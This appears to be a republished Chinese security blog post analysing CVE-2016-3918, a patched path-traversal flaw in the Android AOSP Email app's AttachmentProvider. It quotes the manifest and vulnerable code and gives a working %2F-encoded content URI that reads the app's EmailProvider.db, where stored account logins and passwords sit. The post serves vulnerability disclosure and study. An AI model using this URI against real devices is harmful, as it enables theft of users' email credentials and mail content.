一个漏洞泄露你的邮箱的所有秘密

[[173788]]

谷歌近期对外公布了2016年10月的Nexus Security Bulletin ,这其中包含一个由360手机卫士阿尔法团队(Alpha Team)提交的电子邮件信息泄露漏洞(CVE-2016-3918 ),谷歌对此漏洞的评级为高危险等级。该漏洞可导致恶意应用获取到电子邮件内的数据,可能是电子邮件内容、电子邮件附件甚至账号密码。目前谷歌已经修复该漏洞并向OEM厂商推送了补丁,本文将对此漏洞进行分析。

本文的测试环境和代码版本如下:

  • SDK Version: 23,
  • Android 6.0.1 Build: MOB30Y
  • Branch: android-6.0.1_r60

漏洞成因

在Android AOSP的Email应用程序的源码中,我们可以看到在AndroidManifest.xml 文件中存在名为AttachmentProvider的ContentProvider。

  1. <provider 
  2.  android:name=".provider.AttachmentProvider" 
  3.  android:authorities="com.android.email.attachmentprovider" 
  4.  android:grantUriPermissions="true" 
  5.  android:exported="true" 
  6.  android:readPermission="com.android.email.permission.READ_ATTACHMENT" 
  7.  /> 

其主要属性如下:

  • exported true即对外开放
  • authorities com.android.email.attachmentprovider 即URI唯一标识
  • readPermission com.android.email.permission.READ_ATTACHMENT 即读取需要此权限

通过查询我们可以了解到com.android.email.permission.READ_ATTACHMENT权限的protectionLevel为 dangerous,即可被第三方应用获取到。

  1. <permission 
  2. android:name="com.android.email.permission.READ_ATTACHMENT" 
  3. android:permissionGroup="android.permission-group.MESSAGES" 
  4. android:protectionLevel="dangerous" 
  5. android:label="@string/permission_read_attachment_label" 
  6.  android:description="@string/permission_read_attachment_desc"/> 

在确定此ContentProvider可以被第三方应用接触到之后,我们定位AttachmentProvider的源码。 源码路径如下:

  1. /packages/apps/Email/provider_src/com/android/email/provider/AttachmentProvider.java 

通过阅读源码我们可以发现AttachmentProvider中实现了一个public的openFile 接口,该接口会返回一个ParcelFileDescriptor类型的对象供调用者打开文件。

  1. public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException { 

进入openFile接口立刻就会判断mode值是否为 “w” ,如果为w则会返回一个可写的文件描述符。但在返回之前,函数的实现代码进行了权限检查,如果调用者没有com.android.email.permission.ACCESS_PROVIDER 权限的话是会抛异常的。而该权限的声明如下:

  1. <permission 
  2.  android:name="com.android.email.permission.ACCESS_PROVIDER" 
  3.  android:protectionLevel="signature" 
  4.  android:label="@string/permission_access_provider_label" 
  5.  android:description="@string/permission_access_provider_desc"/> 

可以看到该权限是无法被第三方应用获取到的,所以获取可写的权限是不可行的。 继续往下分析代码。

  1. List<String> segments = uri.getPathSegments(); 
  2. String accountId = segments.get(0); 
  3. String id = segments.get(1); 
  4. String format = segments.get(2); 
  5. if (AttachmentUtilities.FORMAT_THUMBNAIL.equals(format)) {  
  6. int width = Integer.parseInt(segments.get(3));  
  7. int height = Integer.parseInt(segments.get(4)); 
  8.  ... 
  9. else { 
  10.  return ParcelFileDescriptor.open(  
  11. new File(getContext().getDatabasePath(accountId + ".db_att"), id), 
  12.  ParcelFileDescriptor.MODE_READ_ONLY); 

接下来一系列代码会从uri.getPathSegments()中分割开不同的字段,并从中读取相应的配置参数。 当 format参数不等于”THUMBNAIL”时,该代码将会直接返回一个getDatabasePath()该目录下名为id 的文件的文件描述符。 而id参数是上面从uri.getPathSegments().get(1) 得到的,获取之后则没有任何处理。 uri.getPathSegments()方法的作用是将字符串以”/”进行分割,但由于其没有对经过url 编码的字符串进行解码,导致在处理过程中,对于/编码之后的%2f则将不做处理,从而绕过getPathSegments的分割。

漏洞利用

根据上面我们对于代码的分析,可以得出AttachmentProvider的uri如下:

  1. content://accountId/id/format/width/height 

我们如果想利用此漏洞读取数据,为使程序流能够成功运行至目标位置,需要构造如下uri

  1. content://com.android.email.attachmentprovider/1/file_position/1/1/1 

而且,getDatabasePath()的目录是/data/user/0/com.android.email/databases/,如果我们要读取Email 邮件的数据,则需要跳转至目标目录/data/data/com.android.email/来读取Email应用的sqlite数据库文件,我们需要构造如下 uri:

  1. content://com.android.email.attachmentprovider/1/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fdata%2Fdata%2Fcom.android.email%2Fdatabases%2FEmailProvider.db/1/1/1 

而EmailProvider.db中存储了我们已登陆账户的账户名和密码,对应的结构为HostAuth表的login和password 字段。 我们构造的PoC截图如下:

总结

至此,CVE-2016-3918漏洞的分析和利用已经完成。 经过我们的测试,目前多款主流手机机型的自带电子邮件客户端都存在该问题,如小米 NOTE、华为P9、三星S5等机型,为了账户的安全,请使用存在漏洞手机的用户暂停使用电子邮件客户端并清除账户信息,换至其他邮件客户端。

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/141014.html<

(0)
运维的头像运维
上一篇2025-03-04 05:13
下一篇 2025-03-04 05:15

相关推荐

  • 个人主题怎么制作?

    制作个人主题是一个将个人风格、兴趣或专业领域转化为视觉化或结构化内容的过程,无论是用于个人博客、作品集、社交媒体账号还是品牌形象,核心都是围绕“个人特色”展开,以下从定位、内容规划、视觉设计、技术实现四个维度,详细拆解制作个人主题的完整流程,明确主题定位:找到个人特色的核心主题定位是所有工作的起点,需要先回答……

    2025-11-20
    0
  • 社群营销管理关键是什么?

    社群营销的核心在于通过建立有温度、有价值、有归属感的社群,实现用户留存、转化和品牌传播,其管理需贯穿“目标定位-内容运营-用户互动-数据驱动-风险控制”全流程,以下从五个维度展开详细说明:明确社群定位与目标社群管理的首要任务是精准定位,需明确社群的核心价值(如行业交流、产品使用指导、兴趣分享等)、目标用户画像……

    2025-11-20
    0
  • 香港公司网站备案需要什么材料?

    香港公司进行网站备案是一个涉及多部门协调、流程相对严谨的过程,尤其需兼顾中国内地与香港两地的监管要求,由于香港公司注册地与中国内地不同,其网站若主要服务内地用户或使用内地服务器,需根据服务器位置、网站内容性质等,选择对应的备案路径(如工信部ICP备案或公安备案),以下从备案主体资格、流程步骤、材料准备、注意事项……

    2025-11-20
    0
  • 如何企业上云推广

    企业上云已成为数字化转型的核心战略,但推广过程中需结合行业特性、企业痛点与市场需求,构建系统性、多维度的推广体系,以下从市场定位、策略设计、执行落地及效果优化四个维度,详细拆解企业上云推广的实践路径,精准定位:明确目标企业与核心价值企业上云并非“一刀切”的方案,需先锁定目标客户群体,提炼差异化价值主张,客户分层……

    2025-11-20
    0
  • PS设计搜索框的实用技巧有哪些?

    在PS中设计一个美观且功能性的搜索框需要结合创意构思、视觉设计和用户体验考量,以下从设计思路、制作步骤、细节优化及交互预览等方面详细说明,帮助打造符合需求的搜索框,设计前的规划明确使用场景:根据网站或APP的整体风格确定搜索框的调性,例如极简风适合细线条和纯色,科技感适合渐变和发光效果,电商类则可能需要突出搜索……

    2025-11-20
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注